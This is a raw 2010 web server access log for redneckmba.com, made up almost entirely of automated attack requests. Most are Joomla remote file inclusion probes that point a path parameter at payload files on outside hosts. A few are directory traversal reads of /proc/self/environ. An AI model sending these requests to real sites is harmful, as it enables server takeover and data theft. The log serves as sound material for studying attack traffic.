95.211.71.21 - - [26/Jul/2010:16:03:55 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:07:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:07:32 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:07:32 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:16:07:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:08:35 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:08:35 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:08:35 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:10:33 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:10:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:10:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:10:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:15:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:15:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:16:46 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:16:46 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:16:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.82.118 - - [26/Jul/2010:16:16:46 -0700] "GET /logs//?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [26/Jul/2010:16:16:47 -0700] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:39 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:57 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:19:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:23:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:23:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:24:12 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:24:12 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:25:22 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:25:56 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:25:56 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:25:57 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:26:39 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:26:47 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:26:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:26:48 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:26:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:27:10 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:28:13 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:28:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:30:12 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [26/Jul/2010:16:32:59 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:15 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:15 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:27 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:27 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:16:33:27 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
86.110.175.18 - - [26/Jul/2010:16:36:49 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "redneckmba.com"
86.110.175.18 - - [26/Jul/2010:16:36:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:36:58 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:36:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:36:59 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:16:39:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:41:05 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:41:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:43:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:43:12 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:43:12 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:43:18 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:43:18 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "redneckmba.com"
212.97.32.106 - - [26/Jul/2010:16:43:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
212.97.32.106 - - [26/Jul/2010:16:43:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:43:36 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:43:36 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:43:36 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:16:44:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:16:44:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:45:26 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:45:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:16:45:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:45:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
207.46.204.188 - - [26/Jul/2010:16:45:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:45:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:48:55 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
207.46.204.188 - - [26/Jul/2010:16:51:08 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
216.227.214.212 - - [26/Jul/2010:16:52:15 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.18.213.162 - - [26/Jul/2010:16:52:30 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
212.97.32.106 - - [26/Jul/2010:16:53:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:16:53:58 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:55:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:55:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:55:12 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:55:58 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:55:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.80.122.44 - - [26/Jul/2010:16:55:59 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:59:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:59:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
217.112.35.54 - - [26/Jul/2010:16:59:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
86.110.175.18 - - [26/Jul/2010:16:59:23 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
86.110.175.18 - - [26/Jul/2010:16:59:24 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:17:02:56 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:17:02:56 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:17:02:56 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
175.180.213.146 - - [26/Jul/2010:17:06:11 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
81.80.122.44 - - [26/Jul/2010:17:06:19 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
81.80.122.44 - - [26/Jul/2010:17:06:19 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
151.1.253.1 - - [26/Jul/2010:17:06:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:10:16 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:10:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:15:38 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:15:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:15:38 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:17:18:41 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.211.71.21 - - [26/Jul/2010:17:18:52 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:20:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
76.13.114.105 - - [26/Jul/2010:17:22:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
